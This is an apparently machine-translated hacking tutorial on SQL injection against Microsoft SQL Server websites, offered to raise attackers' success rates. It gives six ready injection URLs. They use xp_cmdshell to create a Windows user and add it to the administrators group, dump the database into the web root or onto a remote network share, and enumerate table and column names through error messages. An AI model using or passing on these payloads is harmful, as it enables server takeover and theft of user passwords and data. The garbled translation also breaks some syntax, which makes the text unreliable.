After reading the entry and advanced articles, it is no problem to crack the general website. But if you can't touch the name of the table name, or how the author is filtered with some special characters, how to improve the success rate of injection? How to improve the guess efficiency? Let everyone look down in the high-end.
In the first section, use the system table to inject the SQLServer database
SQLServer is a powerful database system that has a close contact with the operating system, which brings great convenience to developers, but on the other hand, it also provides a springboard for the injection, let's take a look at several Specific example:
1 http://site/url.asp? Id = 1; exec master "Net user name password / add"--Dd "-Dec master..xp_cmdshell
Sequel; in SQL Server, the two sentences are separated, - indicates that the following statement is a comment, so this statement will be divided into two sentences in SQL Server, first, SELECT Id = 1 record, then execute storage Process XP_cmdshell, this stored procedure is used to call the system command, so use the NET command to create a new user name name Name, password is the Windows account number, then:
2 http: //site/url.asp? Id = 1; exec master "NET localgroup name administrators / add" -
Join the new account Name to the administrator group, don't have to be used, you have already got the system's highest permission! Of course, this method is only applicable to the case where the database is connected to the SA, otherwise, there is no permission to call XP_cmdshell.
3 http://site/url.asp? Id = 1 ;; and db_name ()> 0
There is a similar example and user> 0, and the role is to obtain the connection user name, DB_NAME () is another system variable, returning is the connected database name.
4 http: //site/url.asp? Id = 1; Backup Database Database name to disk = 'c: /inetpub/wwroot/1.db'; -
This is a quite a trick, from 3 database name, plus some IIS error exposed absolute path, back up the database back to the web directory, and use HTTP to complete the entire database, complete the entire download, All administrators and user passwords are unfair! When you don't know the absolute path, you can also back up the method of the network address (such as //202.96.xx.xx/share/1.db), but the success rate is not high.
5 http://site/url.asp? Id = 1 ;; and (select top 1 name from sysobjects where xtype = 'u' and status> 0)> 0
As mentioned earlier, sysObjects is the system table of SQL Server, stores all the table names, views, constraints, and other objects, Xtype = 'u' and status> 0, indicating the table name created by the user, the above statement will be the first table. The name is taken out, and the 0 is relatively small, so that the error message is exposed to the table name. Second, how to get the third table name? Or leave our smart readers think.
6 http://site/url.asp? Id = 1 ;; and (select top 1 col_name (Object_ID ('Name'), 1) from sysobjects> 0
After getting the table name from 5, use Object_ID ('Name') to get the internal ID, col_name (Name ID, 1) of the table name, represent the first field name of the table, change 1 to 2, 3, 4 ... You can get the field name inside the guess table one by one.
The above 6 points is that I have studied SQL Server injection of hardcore crystals, it can be seen that the degree of understanding of SQL Server directly affects success rate and guessing speed. After I study SQLServer injection, I also got a lot of improvement in development, huh, maybe safety and development was completed.
(Source: 9cbs)
